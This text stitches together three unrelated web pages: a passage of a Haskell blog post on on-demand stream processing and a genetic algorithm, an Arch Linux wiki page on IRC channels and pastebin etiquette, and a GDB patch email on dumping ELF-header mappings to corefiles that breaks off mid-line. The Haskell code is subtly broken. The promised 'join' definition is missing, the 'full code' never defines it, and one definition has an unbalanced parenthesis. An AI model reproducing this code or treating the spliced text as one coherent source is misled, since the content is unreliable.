model suspended computations is with a continuation: | In (Maybe input -> OnDemand input output) where the input parameter is wrapped in a Maybe because the input stream may have ran out. Using this definition, we can rewrite our sum_so_far as a filter: {-# LANGUAGE LambdaCase #-} {- ... -} sum_so_far :: OnDemand Int Int sum_so_far = loop 0 where loop :: Int -> OnDemand Int Int loop sum = Out sum (In $ \case Nothing -> Halt Just n -> loop (sum + n)) We can make this work on lists again with a simple adapter: convert_list :: OnDemand input out -> [input] -> [out] convert_list = \case Halt -> \_ -> [] Out out cont -> \ls -> out : convert_list cont ls In f -> \case [] -> convert_list (f Nothing) [] hd:tl -> convert_list (f $ Just hd) tl and we can use (convert_list sum_so_far) as we did before, with both finite and infinite lists: *Main> (convert_list sum_so_far) [1, 2, 3, 4, 5] [0,1,3,6,10,15] *Main> let ints = 1:map (+1) ints *Main> take 10 $ (convert_list sum_so_far) ints [0,1,3,6,10,15,21,28,36,45] *Main> But let's stay in the realm of streams for a bit. First, let's define a simple function to produce a stream from a list: out_list :: [a] -> OnDemand () a out_list [] = Halt out_list (h:t) = Out h (out_list t) Then, let's define a function to drain a stream into a list: drain :: OnDemand () b -> [b] drain = \case Halt -> [] Out b kont -> b : drain kont In f -> drain $ f Nothing Now, we can do fun stuff like *Main> drain $ out_list [1, 2, 3, 4] [1,2,3,4] *Main> Ok, so maybe that's not so much fun yet. We'd like to be able to express the equivalent of take 10 $ sum_so_far $ ints. Let's first work on each of these pieces. We can get a stream of naturals with ints :: OnDemand () Int ints = loop 1 where loop n = Out n (loop (n + 1)) and we can limit a stream to a given number of elements with: take_od :: Int -> OnDemand a a take_od 0 = Halt take_od n = In (\case Nothing -> Halt Just a -> Out a (take_od $ n - 1)) We now have all the pieces. What's the equivalent of $? We need to take two filters and return a filter than combines them. Here is the code:) We start from the outer filter. If that one says to stop, we don't need to look into any more input from the inner filter. If we have an output ready, we can just produce that. So far, so good. What happens if the outer filter needs an input? Well, in that case, we need to look at the inner one. Does it have an output ready? If so, we can just feed that into the outer filter. Is it halted? We can feed that information into the outer filter by calling its continuation with Nothing. Finally, if the inner filter itself is also waiting for an input, we have no other choice but to ask for more input from the context. We can now have a bit more fun: *Main> drain $ ints `join` sum_so_far `join` take_od 20 [0,1,3,6,10,15,21,28,36,45,55,66,78,91,105,120,136,153,171,190] *Main> This may look like the beginnings of a useful abstraction. But can we do IO with it? Let's try to write read_nums. We still cannot write a OnDemand () (IO Int) that would be useful, just like we could not write a useful IO [Int]. But the whole point of this OnDemand stuff is to do operations one at a time. So let's define a function that gets a single integer: import qualified Text.Read {- ... -} read_num :: IO (Maybe Int) read_num = Text.Read.readMaybe <$> getLine We cannot create an infinite stream of lazy IO actions. We've already gone through that rabbit hole. But what we can do is define a function that will run a filter within the IO context and generate all the required elements on demand: process :: IO (Maybe a) -> OnDemand a b -> IO [b] process io = \case Halt -> return [] Out hd k -> do tl <- process io k return $ hd : tl In f -> do input <- io process io (f input) Now we can use the exat same sum_so_far filter with values coming from pure and impure contexts: *Main> drain $ ints `join` sum_so_far `join` take_od 10 [0,1,3,6,10,15,21,28,36,45] *Main> process read_num $ sum_so_far `join` take_od 5 1 2 3 4 [0,1,3,6,10] *Main> Here is the full code for reference: {-# LANGUAGE LambdaCase #-} module Main where import qualified Text.Read data OnDemand a b = Halt | Out b (OnDemand a b) | In (Maybe a -> OnDemand a b) sum_so_far :: OnDemand Int Int sum_so_far = loop 0 where loop :: Int -> OnDemand Int Int loop sum = Out sum (In $ \case Nothing -> Halt Just n -> loop (sum + n)) convert_list :: OnDemand input out -> [input] -> [out] convert_list = \case Halt -> \_ -> [] Out out cont -> \ls -> out : convert_list cont ls In f -> \case [] -> convert_list (f Nothing) [] hd:tl -> convert_list (f $ Just hd) tl out_list :: [a] -> OnDemand () a out_list [] = Halt out_list (h:t) = Out h (out_list t) drain :: OnDemand () b -> [b] drain = \case Halt -> [] Out b kont -> b : drain kont In f -> drain $ f Nothing ints :: OnDemand () Int ints = loop 1 where loop n = Out n (loop (n + 1)) take_od :: Int -> OnDemand a a take_od 0 = Halt take_od n = In (\case Nothing -> Halt Just a -> Out a (take_od $ n - 1))) print_od :: Show b => OnDemand a b -> IO () print_od = \case Halt -> return () In _ -> print "Error: missing input" Out b k -> do print b print_od k read_num :: IO (Maybe Int) read_num = Text.Read.readMaybe <$> getLine process :: IO (Maybe a) -> OnDemand a b -> IO [b] process io = \case Halt -> return [] Out hd k -> do tl <- process io k return $ hd : tl In f -> do input <- io process io (f input) main :: IO () main = do let same_filter = sum_so_far `join` take_od 10 let pure_call = drain $ ints `join` same_filter sidef_call <- process read_num $ same_filter print pure_call print sidef_call And here is a sample invocation: $ stack run <<< $(seq 1 9) [0,1,3,6,10,15,21,28,36,45] [0,1,3,6,10,15,21,28,36,45] $ So, how hard is it to map all of these learnings to our little genetic algorithm from last week? A lot easier than it may seem, actually. First, we need to add the OnDemand data definition: +data OnDemand a b + = Halt + | Out b (OnDemand a b) + | In (a -> OnDemand a b) + Next, we need to change the exec_random function: since we're going to ask for random values from our caller explicitly, we don't need to carry around a list anymore. In fact, we don't need to carry any state around anymore, which makes this monad look almost unnecessary. Still, it offers a slightly nicer syntax for client functions ( GetRand instead of explicit continuations). It's also quite nice that almost none of the functions that use the monad need to change here. -exec_random :: WithRandom a -> [Double] -> ([Double] -> a -> b) -> b -exec_random m s cont = case m of - Bind ma f -> exec_random ma s (\s a -> exec_random (f a) s cont) - Return a -> cont s a - GetRand -> cont (tail s) (head s) +exec_random :: WithRandom a -> (a -> OnDemand Double b) -> OnDemand Double b +exec_random m cont = case m of + Bind ma f -> exec_random ma (\a -> exec_random (f a) cont) + Return a -> cont a + GetRand -> In (\r -> cont r) The biggest change is the signature of the main genetic_search function: instead of getting a [Double] as the last input and returning a [(solution, Double)], we now just return a OnDemand Double (solution, Double). - -> [Double] - -> [(solution, Double)] -genetic_search fitness mutate crossover make_solution rnd = - map head $ exec_random init - rnd - (\rnd prev -> loop prev rnd) + -> OnDemand Double (solution, Double) +genetic_search fitness mutate crossover make_solution = + exec_random init (\prev -> Out (head prev) (loop prev)) where - loop :: [(solution, Double)] -> [Double] -> [[(solution, Double)]] - loop prev rnd = prev : exec_random (step prev) - rnd - (\rnd next -> loop next rnd) + loop :: [(solution, Double)] -> OnDemand Double (solution, Double) + loop prev = exec_random (step prev) (\next -> Out (head next) (loop next)) The changes here are mostly trivial: we just remove the manual threading of the random list, and add one explicit Out to the core loop. Finally, we of course need to change the call in the main function to actually drive the new version and provide random numbers on demand. This is a fairly trivial loop: - print $ map snd - $ take 40 - $ genetic_search fitness mutate crossover mk_sol rands + loop rands 40 $ genetic_search fitness mutate crossover mk_sol + where + loop :: [Double] -> Int -> OnDemand Double ((Double, Double), Double) -> IO () + loop rs n od = + if n == 0 + then return () + else case od of + Halt -> return () + In f -> do + next_rand <- pure (head rs) + loop (tail rs) n (f next_rand) + Out v k -> do + print v + loop rs (n - 1) k Obviously in an ideal scenario the next_rand <- pure (head rs) could be more complex; the point here is just to illustrate that we can do any IO we want to produce the next random element. The full, updated code can be found here (diff).
https://cuddly-octo-palm-tree.com/posts/2021-03-28-lazy-io/
CC-MAIN-2022-40
en
refinedweb
Arch IRC channels To use Internet Relay Chat (IRC), you need an IRC client. The installation live environment includes the Irssi client. You are expected to familiarize yourself with our Code of conduct and General guidelines#IRC before joining any of the official channels. For a list of commonly used abbreviations, see Arch terminology and IRC Jargon. Main channels +e). This section is about #archlinux, the main Arch Linux support IRC channel, and #archlinux-offtopic, the main Arch Linux social channel, both available on the Libera Chat network. See Libera Chat FAQ, as well as NickServ HELP when connected to irc.libera.chat: /query NickServ HELP REGISTER /query NickServ HELP IDENTIFY - If /queryhappens to not work in your client, you can try using either /quote NickServ commandor /msg NickServ command. - Some IRC clients have a race-condition where they try to autojoin channels before you have been identified with NickServ. You need to enable SASL to solve this. Either look up your IRC client's documentation or look at the Libera Chat SASL page to find instructions for how to enable it. - You can get a list of people who can help you by typing /msg ChanServ FLAGS #archlinux, or join #libera and ask there. Channel operators Arch operators are ops in both #archlinux and #archlinux-offtopic. See the list below, or run /msg phrik listops on Libera Chat. If you for some reason need the help of an op, do not be shy to /query or /msg us. Here is the list of ops as of 2021-09-24: - alad - amcrae - BrainDamage - gehidore / man - grawity - heftig - jelle - MrElendig / Mion - Namarrgon - tigrmesh / tigr - wonder / ioni Libera Chat group contacts Group contacts mediate matters between the Libera Chat network staff, Arch Linux staff and Arch Linux users. That includes the management of channels in the #archlinux-* namespace on the Libera Chat network and the assignment of archlinux/* hostmasks. Please note that only Arch Linux staff is eligible for hostmasks. - wonder / ioni - fukawi2 - anthraxx - dvzrv - Namarrgon Collaborative debugging When requesting help from an IRC help channel (like #archlinux), it is inappropriate to paste logs into the channel and this may even get you kicked. Use a pastebin instead, you can use phriks factoid !paste to see which pastebins are acceptable. Acceptable pastebins usually work without enabling JavaScript. Some require enabling JavaScript for posting from a web browser, which is still acceptable because it does not affect the viewer. They should not display advertising or other disrupting content and should also not require a login. Excellent pastebins usually provide a way to paste output via piping. An example list of acceptable pastebins: - - supports pasting of almost any filetype. May have slightly broken MIME type detection. - - supports pasting of images, but MIME type will be off. - - good for people who want something graphical. - - http-only. Popular, but it is useful when debugging an SSL issue which means that https-only pastebins can not be used. IRC usage When first entering the channel, there is no need to say hello. State the problem you are experiencing and make sure to be verbose and to provide logfiles. It also helps to search for any error messages you are getting first to not waste anybodys time. It is also worth it to search for issues on any of the bugtrackers of the relevant software. The more helpful and verbose you are, the quicker you are going to receive help. If this is a problem or question which is very specific to a specific software, consider visiting the dedicated IRC channel for it if there is one. It is more likely to receive a good answer there. Output errors/messages to a file Sometimes it is not possible to pipe the output to a pastebin directly and it should be written into a file before. $ application &> application-output.txt This is useful if pasting logs that contain sensitive data, e.g serial numbers in smartctl output, which have to be manually edited out. Other channels The size of our community led to the creation of multiple IRC channels. To get a list of all channels on irc.libera.chat that contain archlinux in their name, use the command /query alis LIST *archlinux*. International IRC channels International discussions are available at the following channels, also located at the irc.libera.chat IRC network, unless stated otherwise.
https://wiki.archlinux.org/title/IRC_channel
CC-MAIN-2022-40
en
refinedweb
#include <Configuration.h> #include <Configuration.h> List of all members. This class is present as the internal portion of a section's value hash table It may store string, integer or binary data. Default constructor. [explicit] String constructor, takes ownership of string. Integer constructor. Binary constructor, takes ownership of data. Copy ctor. Destructor. Assignment operator. Points to the string value or binary data or IS the integer Length is only used when type_ == BINARY
https://www.dre.vanderbilt.edu/Doxygen/5.4.4/html/ace/classACE__Configuration__Value__IntId.html
CC-MAIN-2022-40
en
refinedweb
>> palindrome number by using while loop C in Depth: The Complete C Programming Guide for Beginners 45 Lectures 4.5 hours Practical C++: Learn C++ Basics Step by Step 50 Lectures 4.5 hours Master C and Embedded C Programming- Learn as you go 66 Lectures 5.5 hours Palindrome number is a number which remains same when it reverses. In C language, the user is allowed to enter any positive integer and to check, whether the given number is palindrome number or not by using the while loop. Example1 Following is the C Program to find Palindrome number by using the while loop − #include <stdio.h> int main(){ int num, temp, rem, rev = 0; printf("enter a number:\n"); scanf("%d", &num); temp = num; while ( temp > 0){ rem = temp %10; rev = rev *10+ rem; temp = temp /10; } printf("reversed number is = %d\n", rev); if ( num == rev ) printf("\n%d is Palindrome Number.\n", num); else printf("%d is not the Palindrome Number.\n", num); return 0; } Output When the above program is executed, it produces the following result − enter a number: 1234 reversed number is = 4321 1234 is not the Palindrome Number. enter a number: 1221 reversed number is = 1221 1221 is Palindrome Number. Example2 Consider another example for the C program to find palindrome number by using the while loop for strings. #include <stdio.h> #include <string.h> void pal(char string[]); int main(){ char string[100]; printf("enter a string: "); gets(string); pal(string); return 0; } void pal(char string[]){ int i = 0; int length = strlen(string) - 1; while (length > i){ if(string[i++] != string[length--]){ printf("\n %s is not a palindrome", string); return; } } printf("\n %s is a palindrome string", string); } Output When the above program is executed, it produces the following result − enter a string: tutorial tutorial is not a palindrome enter a string: saas saas is a palindrome string - Related Questions & Answers - do…while loop vs. while loop in C/C++ - Java program to calculate the factorial of a given number using while loop - Java program to print the fibonacci series of a given number using while loop - C program to print multiplication table by using for Loop - C program to print number series without using any loop - Write a C program to reduce any fraction to least terms using while loop - Find out the GCD of two numbers using while loop in C language - C Program for Print the pattern by using one loop - How to use C# do while loop? - Java while loop - For Versus While Loop in C - How to create nested while loop in C#? - Write a C program to calculate the average word length of a sentence using while loop - Difference Between while and do-while Loop - Java Program to print Number series without using any loop Advertisements
https://www.tutorialspoint.com/c-program-to-find-palindrome-number-by-using-while-loop
CC-MAIN-2022-40
en
refinedweb
="stage"> <div class="container"> <div class="ring"> <div class="img"></div> <div class="img"></div> <div class="img"></div> <div class="img"></div> <div class="img"></div> <div class="img"></div> <div class="img"></div> <div class="img"></div> <div class="img"></div> <div class="img"></div> </div> </div> </div> html, body, .stage, .ring, .img { width:100%; height: 100%; transform-style: preserve-3d; user-select:none; } html, body, .stage { overflow:hidden; background:#000; } div, svg { position: absolute; } .container { perspective: 2000px; width: 300px; height: 400px; left:50%; top:50%; transform:translate(-50%,-50%); } let xPos = 0; gsap.timeline() .set('.ring', { rotationY:180, cursor:'grab' }) //set initial rotationY so the parallax jump happens off screen .set('.img', { // apply transform rotations to each image rotateY: (i)=> i*-36, transformOrigin: '50% 50% 500px', z: -500, backgroundImage:(i)=>'url('+(i+32)+'/600/400/)', backgroundPosition:(i)=>getBgPos(i), backfaceVisibility:'hidden' }) .from('.img', { duration:1.5, y:200, opacity:0, stagger:0.1, ease:'expo' }) .add(()=>{ $('.img').on('mouseenter', (e)=>{ let current = e.currentTarget; gsap.to('.img', {opacity:(i,t)=>(t==current)? 1:0.5, ease:'power3'}) }) $('.img').on('mouseleave', (e)=>{ gsap.to('.img', {opacity:1, ease:'power2.inOut'}) }) }, '-=0.5') $(window).on('mousedown touchstart', dragStart); $(window).on('mouseup touchend', dragEnd); function dragStart(e){ if (e.touches) e.clientX = e.touches[0].clientX; xPos = Math.round(e.clientX); gsap.set('.ring', {cursor:'grabbing'}) $(window).on('mousemove touchmove', drag); } function drag(e){ if (e.touches) e.clientX = e.touches[0].clientX; gsap.to('.ring', { rotationY: '-=' +( (Math.round(e.clientX)-xPos)%360 ), onUpdate:()=>{ gsap.set('.img', { backgroundPosition:(i)=>getBgPos(i) }) } }); xPos = Math.round(e.clientX); } function dragEnd(e){ $(window).off('mousemove touchmove', drag); gsap.set('.ring', {cursor:'grab'}); } function getBgPos(i){ //returns the background-position string to create parallax movement in each image return ( 100-gsap.utils.wrap(0,360,gsap.getProperty('.ring', 'rotationY')-180-i*36)/360*500 )+'px 0px'; } Also see: Tab Triggers
https://codepen.io/creativeocean/pen/mdROBXx
CC-MAIN-2022-40
en
refinedweb
How to render outlines in WebGL This article describes how to visualize outlines for a WebGL scene as a post process, with example implementations for ThreeJS & PlayCanvas. There are a few common approaches that produce boundary-only outlines as shown on the left of the above picture. - Drawing objects twice, such that the backfaces make up the outline, described here. - A post process using the depth buffer, implemented in ThreeJS here. - Similar post process implemented in PlayCanvas here. Rendering the full outlines of a scene is particularly useful when you need to clearly see the geometry and structure of your scene. For example, the stylized aesthetic of Return of the Obra Dinn would be very hard to navigate without clear outlines. The technique I describe here is similar to the post process shaders linked above, with the addition of a “normal buffer” in the outline pass that is used to find those inner edges. Live Demo Below is a link to a live demo of this technique implemented in ThreeJS. You can drag and drop any glTF model (as a single .glb file) to see the outline effect on your own test models: You can also find the source code on GitHub:. Overview of the technique Our outline shader needs 3 inputs: - The depth buffer - The normal buffer - The color buffer (the original scene) Given these 3 inputs we will compute the difference between the current pixel’s depth value and its neighbors. A large depth difference tells us there’s a distance gap (this will typically give you the outer boundary of an object but not fine details on its surface). We will do the same with the normal buffer. A difference in normal direction means a sharp corner. This is what gives us the finer details. We then combine those differences to form the final outline, and combine that with the color buffer to add the outlines to the scene. Tip: The live demo has a scaling factor for each of the normal & depth. You can scale that to 0 to see the influence of each on the final set of outlines. Overview of the rendering pipeline Here is how we’re going to set up our effect: Render pass 1 captures the color of all objects in the scene in “Scene Buffer”. It also outputs the depth of every pixel in a separate “Depth Buffer”. Render pass 2 re-renders all objects in the scene with a normal material that colors it using the object’s view-normal at every pixel. This is written to the “Normal Buffer”. Finally, Outline pass is a post process, taking the 3 buffers and rendering onto a fullscreen quad. This can be further optimized by modifying the engine to combine the normal and depth buffers into one “NormalDepth”, similar to how Unity does it, to avoid the need for the 2nd render pass. A final step not shown in the diagram is an FXAA pass, which we need because we’re rendering the scene onto an off-screen buffer, which disables the browser’s native antialiasing. Implementation It’s difficult to describe this technique without reference to a specific engine since a core part of it is how to set up the rendering pipeline described above. The implementation details here will be specific to ThreeJS but you can see the PlayCanvas source code along with an editor project here: 1. Get the depth buffer 3D engines will typically draw all opaque objects into a depth buffer to ensure objects are rendered correctly without having to sort them back to front. All we have to do is get a reference to this buffer to pass it to our outline post process. In ThreeJS, this means setting depthBuffer = true on the render target we’re creating so that we capture the “scene color” and the “depth buffer” at the same time. See: In our demo this is created here: There are a few caveats to know when working with the depth buffer: - You need to know how the values are “packed”. Given the limited precision, does the engine just linearly interpolate Z values camera.near to camera.far? Does it do this in reverse? Or use a logarithmic depth buffer? - The engine most likely already has some mechanisms for working with depth values that you can re-use. For ThreeJS, you can include #include <packing>in your fragment shader which will allow you to use these helper functions. - For just visualizing it for debug purposes, you can collapse your camera’s near/far to cover the bounds of the object so you can more clearly see the image. 2. Create a normal buffer If your engine supports outputting the normals of everything in the scene, you should use that directly. Otherwise, you’ll need to create a second render pass. This needs to be identical to the original render, with the only exception that all materials on all meshes are replaced by a “normal material” that renders the view space normals. ThreeJS has a convenient scene.overrideMaterial method we can use for exactly this purpose. Instead of creating a new identical scene and a new identical camera, we can directly re-render the same scene with the given override material. this.renderScene.overrideMaterial = new THREE.MeshNormalMaterial();renderer.render(this.renderScene, this.renderCamera); this.renderScene.overrideMaterial = null; In our ThreeJS implementation this is encapsulated in CustomOutlinePass.js for convenience, but it is a completely separate render pass. 3. Create the outline post process The outline effect is a post process — we’ve already rendered the scene, now we need to take those buffers, combine them, and render the result onto a fullscreen quad. The result of that will either go directly to the screen or to the next pass in the pipeline (like FXAA). We need to pass 3 uniforms: sceneBuffer, depthBuffer, and normalBuffer. We create helper functions to read the depth at an offset from a given pixel. Then we sum up the difference between the current pixel’s depth value and its neighbors. float depth = getPixelDepth(0, 0); // Difference between depth of neighboring pixels and current. float depthDiff = 0.0; depthDiff += abs(depth - getPixelDepth(1, 0)); depthDiff += abs(depth - getPixelDepth(-1, 0)); depthDiff += abs(depth - getPixelDepth(0, 1)); depthDiff += abs(depth - getPixelDepth(0, -1)); The same thing is done for normals as well. Since the normal is a 3 dimensional vector, we get the difference using the distance function. vec3 normal = getPixelNormal(0, 0); // Difference between normals of neighboring pixels and current float normalDiff = 0.0; normalDiff += distance(normal, getPixelNormal(1, 0)); normalDiff += distance(normal, getPixelNormal(0, 1)); normalDiff += distance(normal, getPixelNormal(0, 1)); normalDiff += distance(normal, getPixelNormal(0, -1)); To render the outline only at this point we would do: float outline = normalDiff + depthDiff; gl_FragColor = vec4(vec3(outline), 1.0); There’s a few parameters here to tweak: - We can include the diagonals in our neighbor sampling to get a more accurate outline - We can sample one or more neighbors further, to get thicker outlines - We can multiply normalDiffand depthDiffby a scalar to control their influence on the final outline - We can tweak normalDiffand depthDiffso that only really stark differences in depth or normal direction show up as an outline. This is what the “normal bias” and the “depth bias” parameters control. This is implemented in CustomOutlinePass.js. 4. Combine the outlines with your final scene Finally, to combine the outline onto the scene, we mix the scene color with a chosen “outline color”, based on our outline value. float outline = normalDiff + depthDiff; vec4 outlineColor = vec4(1.0, 1.0, 1.0, 1.0);//white outline gl_FragColor = vec4(mix(sceneColor, outlineColor, outline)); This is also where you can create any custom logic for how you combine your outline with your scene. For example, in the Return of the Obra Dinn, the outlines change color based on the lighting. To achieve this effect we would check the lighting direction against the surface normal in our normal buffer, and color the outline white if it not in direct light, and black if it is facing the light source(s). Thanks for reading! If you found this helpful, follow me on Twitter @Omar4ur to see more of my work. Thanks to Ronja Böhringer whose Outlines via Postprocessing article helped me understand this technique and adapt it for the web. If you have any suggestions or corrections to the code or technique, open an issue on GitHub () or reach out to me directly. You can find my contact info at:
https://omar-shehata.medium.com/how-to-render-outlines-in-webgl-8253c14724f9
CC-MAIN-2022-40
en
refinedweb
This is the mail archive of the gdb-patches@sourceware.org mailing list for the GDB project. This patch has a long story, but it all started back in 2015, with commit df8411da087dc05481926f4c4a82deabc5bc3859 ("Implement support for checking /proc/PID/coredump_filter"). The purpose of that commit was to bring GDB's corefile generation closer to what the Linux kernel does. However, back then, I did not implement the full support for the dumping of memory mappings containing ELF headers (like mappings of DSOs or executables). These mappings were being dumped most of time, though, because the default value of /proc/PID/coredump_filter is 0x33, which would cause anonymous private mappings (DSOs/executable code mappings have this type) to be dumped. Well, until something happened on binutils... A while ago, I noticed something strange was happening with one of our local testcases on Fedora GDB: it was failing due to some strange build-id problem. On Fedora GDB, we (unfortunately) carry a bunch of "local" patches, and some of these patches actually extend upstream's build-id support in order to generate more useful information for the user of a Fedora system (for example, when the user loads a corefile into GDB, we detect whether the executable that generated that corefile is present, and if it's not we issue a warning suggesting that it should be installed, while also providing the build-id of the executable). A while ago, Fedora GDB stopped printing those warnings. I wanted to investigate this right away, and spent some time trying to determine what was going on, but other things happened and I got sidetracked. Meanwhile, the bug started to be noticed by some of our users, and its priority started changing. Then, someone on IRC also mentioned the problem, and when I tried helping him, I noticed he wasn't running Fedora. Hm... So maybe the bug was *also* present upstream. After "some" time investigating, and with a lot of help from Keith and others, I was finally able to determine that yes, the bug is also present upstream, and that even though it started with a change in ld, it is indeed a GDB issue. So, as I said, the problem started with binutils, more specifically after the following commit was pushed: This commit makes ld use "-z separate-code" by default on x86-64 machines. What this means is that code pages and data pages are now separated in the binary, which is confusing GDB when it tries to decide what to dump. BTW, Fedora 28 binutils doesn't have this code, which means that Fedora 28 GDB doesn't have the problem. From Fedora 29 on, binutils was rebased and incorporated the commit above, which started causing Fedora GDB to fail. Anyway, the first thing I tried was to pass "-z max-page-size" and specify a bigger page size (I saw a patch that did this and was proposed to Linux, so I thought it might help). Obviously, this didn't work, because the real "problem" is that ld will always use separate pages for code and data. So I decided to look into how GDB dumped the pages, and that's where I found the real issue. What happens is that, because of "-z separate-code", the first two pages of the ELF binary are (from /proc/PID/smaps): Whereas before, we had only one: 00400000-00401000 r-xp 00000000 fc:01 798593 Notice how we have "Anonymous" data mapped into the page. This will be important. So, the way GDB decides which pages it should dump has been revamped by my patch in 2015, and now it takes the contents of /proc/PID/coredump_filter into account. The default value for Linux is 0x33, which means: Dump anonymous private, anonymous shared, ELF headers and HugeTLB private pages. Or: filter_flags filterflags = (COREFILTER_ANON_PRIVATE | COREFILTER_ANON_SHARED | COREFILTER_ELF_HEADERS | COREFILTER_HUGETLB_PRIVATE); Now, it is important to keep in mind that GDB doesn't always have *all* of the necessary information to exactly determine the type of a page, so the whole algorithm is based on heuristics (you can take a look at linux-tdep.c:dump_mapping_p and linux-tdep.c:linux_find_memory_regions_full for more info). Before the patch to make ld use "-z separate-code", the (single) page containing data and code was being flagged as an anonymous (due to the non-zero "Anonymous:" field) private (due to the "r-xp" permission), which means that it was being dumped into the corefile. That's why it was working fine. Now, as you can imagine, when "-z separate-code" is used, the *data* page (which is where the ELF notes are, including the build-id one) now doesn't have any "Anonymous:" mapping, so the heuristic is flagging it as file-backed private, which is *not* dumped by default. The next question I had to answer was: how come a corefile generated by the Linux kernel was correct? Well, the answer is that GDB, unlike Linux, doesn't actually implement the COREFILTER_ELF_HEADERS support. On Linux, even though the data page is also treated as a file-backed private mapping, it is also checked to see if there are any ELF headers in the page, and then, because we *do* have ELF headers there, it is dumped. So, after more time trying to think of ways to fix this, I was able to implement an algorithm that reads the first few bytes of the memory mapping being processed, and checks to see if the ELF magic code is present. This is basically what Linux does as well, except that, if it finds the ELF magic code, it just dumps one page to the corefile, whereas GDB will dump the whole mapping. But I don't think that's a big issue, to be honest. It's also important to explain that we *only* perform the ELF magic code check if: - The algorithm has decided *not* to dump the mapping so far, and; - The mapping is private, and; - The mapping's offset is zero, and; - The user has requested us to dump mappings with ELF headers. IOW, we're not going to blindly check every mapping. As for the testcase, I struggled even more trying to write it. Since our build-id support on upstream GDB is not very extensive, it's not really possible to determine whether a corefile contains build-id information or not just by using GDB. So, after thinking a lot about the problem, I decided to rely on an external tool, eu-unstrip, in order to verify whether the dump was successful. I verified the test here on my machine, and everything seems to work as expected (i.e., it fails without the patch, and works with the patch applied). We are working hard to upstream our "local" Fedora GDB patches, and we intend to submit our build-id extension patches "soon", so hopefully we'll be able to use GDB itself to perform this verification. I built and regtested this on the BuildBot, and no problems were found. I think it makes sense to include this patch into 8.3, since it's pretty "self-contained", but I will leave that decision to the GMs. gdb/ChangeLog: 2019-04-24 Sergio Durigan Junior <sergiodj@redhat.com> PR corefiles/11608 PR corefiles/18187 * linux-tdep.c (dump_mapping_p): Add new parameters "ADDR" and "OFFSET". Verify if current mapping contains an ELF header. (linux_find_memory_regions_full): Adjust call to "dump_mapping_p". gdb/testsuite/ChangeLog: 2019-04-24 Sergio Durigan Junior <sergiodj@redhat.com> PR corefiles/11608 PR corefiles/18187 * gdb.base/coredump-filter-build-id.exp: New file. * lib/future.exp (gdb_find_eu-unstrip): New procedure. --- gdb/linux-tdep.c | 71 +++++++++++++++---- .../gdb.base/coredump-filter-build-id.exp | 69 ++++++++++++++++++ gdb/testsuite/lib/future.exp | 10 +++ 3 files changed, 137 insertions(+), 13 deletions(-) create mode 100644 gdb/testsuite/gdb.base/coredump-filter-build-id.exp diff --git a/gdb/linux-tdep.c b/gdb/linux-tdep.c index 5de985def3..d71a00666f 100644 --- a/gdb/linux-tdep.c +++ b/gdb/linux-tdep.c @@ -586,8 +586,8 @@ mapping_is_anonymous_p (const char *filename) } /* Return 0 if the memory mapping (which is related to FILTERFLAGS, V, - MAYBE_PRIVATE_P, and MAPPING_ANONYMOUS_P) should not be dumped, or - greater than 0 if it should. + MAYBE_PRIVATE_P, MAPPING_ANONYMOUS_P, ADDR and OFFSET) should not + be dumped, or greater than 0 if it should. In a nutshell, this is the logic that we follow in order to decide if a mapping should be dumped or not. @@ -625,12 +625,17 @@ mapping_is_anonymous_p (const char *filename) see 'p' in the permission flags, then we assume that the mapping is private, even though the presence of the 's' flag there would mean VM_MAYSHARE, which means the mapping could still be private. - This should work OK enough, however. */ + This should work OK enough, however. + + - Even if, at the end, we decided that we should not dump the + mapping, we still have to check if it is something like an ELF + header (of a DSO or an executable, for example). If it is, and + if the user is interested in dump it, then we should dump it. */ static int dump_mapping_p (filter_flags filterflags, const struct smaps_vmflags *v, int maybe_private_p, int mapping_anon_p, int mapping_file_p, - const char *filename) + const char *filename, ULONGEST addr, ULONGEST offset) { /* Initially, we trust in what we received from our caller. This value may not be very precise (i.e., it was probably gathered @@ -640,6 +645,7 @@ dump_mapping_p (filter_flags filterflags, const struct smaps_vmflags *v, (assuming that the version of the Linux kernel being used supports it, of course). */ int private_p = maybe_private_p; + int dump_p; /* We always dump vDSO and vsyscall mappings, because it's likely that there'll be no file to read the contents from at core load time. @@ -680,13 +686,13 @@ dump_mapping_p (filter_flags filterflags, const struct smaps_vmflags *v, /* This is a special situation. It can happen when we see a mapping that is file-backed, but that contains anonymous pages. */ - return ((filterflags & COREFILTER_ANON_PRIVATE) != 0 - || (filterflags & COREFILTER_MAPPED_PRIVATE) != 0); + dump_p = ((filterflags & COREFILTER_ANON_PRIVATE) != 0 + || (filterflags & COREFILTER_MAPPED_PRIVATE) != 0); } else if (mapping_anon_p) - return (filterflags & COREFILTER_ANON_PRIVATE) != 0; + dump_p = (filterflags & COREFILTER_ANON_PRIVATE) != 0; else - return (filterflags & COREFILTER_MAPPED_PRIVATE) != 0; + dump_p = (filterflags & COREFILTER_MAPPED_PRIVATE) != 0; } else { @@ -695,14 +701,53 @@ dump_mapping_p (filter_flags filterflags, const struct smaps_vmflags *v, /* This is a special situation. It can happen when we see a mapping that is file-backed, but that contains anonymous pages. */ - return ((filterflags & COREFILTER_ANON_SHARED) != 0 - || (filterflags & COREFILTER_MAPPED_SHARED) != 0); + dump_p = ((filterflags & COREFILTER_ANON_SHARED) != 0 + || (filterflags & COREFILTER_MAPPED_SHARED) != 0); } else if (mapping_anon_p) - return (filterflags & COREFILTER_ANON_SHARED) != 0; + dump_p = (filterflags & COREFILTER_ANON_SHARED) != 0; else - return (filterflags & COREFILTER_MAPPED_SHARED) != 0; + dump_p = (filterflags & COREFILTER_MAPPED_SHARED) != 0; } + + /* Even if we decided that we shouldn't dump this mapping, we still + have to check whether (a) the user wants us to dump mappings + containing an ELF header, and (b) the mapping in question + contains an ELF header. If (a) and (b) are true, then we should + dump this mapping. + + A mapping contains an ELF header if it is a private mapping, its + offset is zero, and its first word is ELFMAG. */ + if (!dump_p && private_p && offset == 0 + && (filterflags & COREFILTER_ELF_HEADERS) != 0) + { + /* Let's check if we have an ELF header. */ + gdb::unique_xmalloc_ptr<char> header; + int errcode; + + /* Useful define specifying the size of the ELF magical + header. */ +#ifndef SELFMAG +#define SELFMAG 4 +#endif + + /* Read the first SELFMAG bytes and check if it is ELFMAG. */ + if (target_read_string (addr, &header, SELFMAG, &errcode) == SELFMAG + && errcode == 0) + { + const char *h = header.get (); + + if (h[EI_MAG0] == ELFMAG0 && h[EI_MAG1] == ELFMAG1 + && h[EI_MAG2] == ELFMAG2 && h[EI_MAG3] == ELFMAG3) + { + /* This mapping contains an ELF header, so we + should dump it. */ + dump_p = 1; + } + } + } + + return dump_p; } /* Implement the "info proc" command. */ @@ -1306,7 +1351,7 @@ linux_find_memory_regions_full (struct gdbarch *gdbarch, if 